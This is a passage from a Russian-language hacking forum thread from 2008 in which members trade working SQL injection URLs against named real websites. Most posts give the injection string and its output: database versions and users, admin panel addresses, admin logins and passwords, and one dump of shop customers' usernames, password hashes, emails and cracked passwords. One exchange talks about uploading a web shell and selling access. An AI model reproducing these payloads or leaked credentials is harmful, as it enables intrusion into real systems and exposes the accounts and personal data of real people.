ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7071  
Старый 11.12.2008, 23:56
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

Цитата:
Сообщение от Tigger  
masternet, в http://cgsc2.biology.yale.edu кавычки не фильтруются и file priv разрешен. Найдешь путь - зальешь шелл))
а как путь узнать?вот в чём вопрос..так бы уже залил и продал)
у меня в дампере также..
Y - file priv

Последний раз редактировалось masternet; 12.12.2008 в 00:33..
 
Ответить с цитированием

  #7072  
Старый 12.12.2008, 00:26
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

masternet,
Тема не для вопросов и комментариев
Tigger
С чего ты взял, что file_priv Y ?

http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,file_priv,3,4,5,6,7,8,9+from+mysq l.user+where+user='WebUser'--
"N"
 
Ответить с цитированием

  #7073  
Старый 12.12.2008, 10:15
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
http://boutique.toutec.fr/lire/index.php?rubid=-1+union+select+1,2,null,4,unhex(hex(concat_ws(char (32,45,32),version(),user(),database()))),6,7,8,9, 0--
version( 5.0.15-standard )
user(
toutec@localhost )
database(
toutec )
Цитата:
http://boutique.toutec.fr/lire/index.php?rubid=-1+union+select+1,2,null,4,unhex(hex(concat_ws(char (32,45,32),table_name,column_name))),6,7,8,9,0+fro m+information_schema.columns--
##########
Цитата:
http://www.webridershop.com/boutik/lire/index.php?rubid=-1+union+select+1,2,null,unhex(hex(concat_ws(char(3 2,45,32),version(),user(),database()))),5,null,7,8--
version( 4.1.15-Debian_1ubuntu5-log )
user(
webrider@localhost )
database(
webridershop )

##############
Цитата:
http://www.compasdigital.be/lire/index.php?rubid=24+union+select+1,concat_ws(char(3 2,45,32),version(),user(),database()),3--
version( 4.1.22-log )
user(
formule19@10.0.0.78 )
database(
formule19 )

Последний раз редактировалось gisTy; 12.12.2008 в 10:28..
 
Ответить с цитированием

  #7074  
Старый 12.12.2008, 13:52
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

pr7 похоже на форум международного оператора сотовой связи Оранж, но мб и ошибаюсь.
Цитата:
http://forum.orange.fr/liremessages.php?idsection=1828[SQL]&thread=10743
Db: bddforums
Version: 4.1.11-Debian_4sarge7-log
User: forums@fofo05wb.b1.woo
 
Ответить с цитированием

  #7075  
Старый 12.12.2008, 14:18
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.pcr.org.ar/hoy.php?id_nota=-1+union+select+concat_ws(0x3a3a,usuario,clave)+fro m+usuarios+limit+0,1/*

login: tansimPLE
pass: IHfr78MET

Админка
http://www.pcr.org.ar/admin/_administrar.php?area=nomenclador

Коммуняки плиять...
 
Ответить с цитированием

  #7076  
Старый 12.12.2008, 14:51
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.exoticangkor.com/hotels.php?city_id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,username,p assword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26+from+tbl_user+limit+0,1--



http://www.exoticangkor.com/admin/


Баанк!! (Co Джей иМолчаливый Боб)


-----------------------------------------------------------

http://www.trinergy.at/pop_lexikon.php?id=-1+union+select+1,concat_ws(0x3a3a,username,passwor d),3,4+from+users+limit+0,1/*

http://www.trinergy.at/admin

login:CW
pass:CW

Куяк!!!!
---------------------------------------------------------

Последний раз редактировалось Cennarios; 12.12.2008 в 17:27..
 
Ответить с цитированием

  #7077  
Старый 12.12.2008, 17:52
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Магазинчик...

http://www.zakaz.kr.ua/vitrina/tovar/?lev1=9&lev2=12&lev3=17&id=-170/**/UNION/**/SELECT/**/AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,(SELECT/**/CONCAT(id,0x7873716C696E6A64656C,login,0x7873716C6 96E6A64656C,pass,0x7873716C696E6A64656C,mymail)/**/FROM/**/zakazkr_zakaz.customers/**/LIMIT/**/5,1),0x7873716C696E6A656E64),0x71),0x71),2,3,4,5,6 ,7,8,9,10,11,12,13--

Добил их пользователей много всех не стал кому надо далее сам...


[1]:6:karlsson:5a89ed8db9c4a2a2406d570da13e2560:karls son@dela.kr.ua
[2]:7:test:c4ca4238a0b923820dcc509a6f75849b:serge@del a.kr.ua 1
[3]:8:vitaliy:12d72e349bedf045166bf79ae9c66242:vitali y@shtorm.com passwd:0708gw
[4]:9:amigo:a9de3c617cb8e7fab847b08ea1a80e42:amigo@ki rovograd.info passwd:g-shock
[5]:10:lelikx:42019dd47db5aeed2091398fadea7c0b:lelikx @ukr.net passwd:666123
[6]:11:vovan-bmw:8ebfbd869222118c7716a8e87c94dde2:agroteh@romb. net
[7]:12:Хохол:ca56097a3dc3bf5e0626c4da3c84d7a4:ch _vas@ukr.net passwd:180297
[8]:13:artur:c9b5ecdf0b853aab02103542187ea208:artur@r omb.net passwd:artur
[9]:14:asd:cb2c631d23f3e2f9a5d79171c8c1d141:asd@romb. net
[10]:15:xXx:a4f59177af1c5586e49c16a142b2a793:
[11]:16:dimitrius:6e8b08a1285fda750437a1677b0d3286:dim itriusf@rambler.ru
[12]:17:Igor:8b65ac266262fd4f65e1d4a169fedbfd:goshka@r omb.net passwd:311181
[13]:18:Garik:7b90ad7525dbd9a141f76f47f2dd7da5:garikwo rk@rambler.ru
[14]:19:SNIPER:67c6a1e7ce56d3d6fa748ab6d9af3fd7bit@k v.ukrtel.net passwd:47
 
Ответить с цитированием

  #7078  
Старый 12.12.2008, 19:09
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Адрес: www.wbdg.org (74.205.45.163)

Google PR 7 / 10
Яндекс тІЦ 60

Код:
http://www.wbdg.org/ccb/browse_cat.php?o=29&c=-4+union+select+concat_ws(0x3a3a,database(),version(),user()),2--
Database Version: 5.0.67
Database name: ccb
User name: webscript@localhost
 
Ответить с цитированием

  #7079  
Старый 12.12.2008, 19:12
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.nrru.ac.th/web/healthcenter/main.php?pack=readnews&news_id=-1+union+select+1,user_name,3,user_pass,5,6,7,8+fro m+core_user+limit+0,1/*

http://www.nrru.ac.th/web/healthcenter/admin/main.php

login: admin
pass: 12345678


Арабикан гомикас похекас!!! lol
 
Ответить с цитированием

  #7080  
Старый 12.12.2008, 19:21
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

Код:
http://www.globalresearch.ca/PrintArticle.php?articleId=1+union+select+1,concat_ws(0x3a,VERSION(), USER(), DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/*
5.0.24a-log:u70167021@cgihost:d60162207
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ